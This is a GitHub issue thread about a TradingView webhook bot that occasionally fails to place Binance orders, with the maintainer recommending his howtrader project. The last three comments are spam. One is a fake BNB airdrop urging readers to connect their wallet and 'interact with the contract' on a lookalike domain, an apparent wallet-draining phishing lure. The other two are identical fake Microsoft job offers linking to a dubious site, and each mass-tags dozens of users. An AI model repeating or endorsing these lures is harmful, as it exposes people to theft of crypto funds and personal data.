### ISSUE TITLE
Orders not executed on Binance (occasionaly)

### ISSUE THREAD

**Issue by alterdaemon** [51bitquant/binance-tradingview-webhook-bot#2]
Sometimes the orders are not executed, the signals comes in but for some reason it's not commited to Binance.
Usually it concerns:
- exiting
- pyramiding 

Tested under flask testing server as well as under wsgi gunicorn.

It seems like it's losing it's count regarding current user position in the process.

**Comment by 51bitquant** [comment]
It might have some errors like timeout error to get the order data correctly. For this reason， recommend you to use howtrader as it ensure orders' data instantly and  accurately.

**Comment by 51bitquant** [comment]
> It might have some errors like timeout error to get the order data correctly. For this reason， recommend you to use howtrader as it ensure orders' data instantly and accurately.

and I integrated with algo strategy to place order, which may help you reduce trading cost.

**Comment by alterdaemon** [comment]
Thank you for the suggestion.
Can I use howtrader just for orders execution based on TradingView alerts? (without all the other features) ?

**Comment by 51bitquant** [comment]
> Thank you for the suggestion. Can I use howtrader just for orders execution based on TradingView alerts? (without all the other features) ?

yes, as your demand. Or even can tailor your trading strategies/algo strategies with howtrader.

**Comment by MatMarrr** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @AlasTshrugg, @Nelrann, @herrish, @MacOMNI, @Mka1977, @dhelbegor, @Giproman

**Comment by Sakhi29** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.
ferralucho, @gejiliang, @s-brez, @sandrokeil, @ntaamaas, @gyss, @jessecrouch, @blw0rm, @blooalien, @Tsukaya125, @akalmykov, @XenceMaa, @sgtcoolguy, @msn100001, @gclsoft, @gdinkov, @ersingencturk, @brooksgod, @ABSNyyyy, @thierrymarianne

**Comment by Sakhi29** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.
robsonsan, @meoww-bot, @andrewpaulicek, @yskaaks, @VaughnGH, @averybigant, @khc25, @vamdt, @maxgfr, @ptthisdan, @0219nice, @pepijnolivier, @grasses, @poksme, @tlkahn, @v3rse, @matthewmueller, @aburan28, @Unrest-a, @steven2358
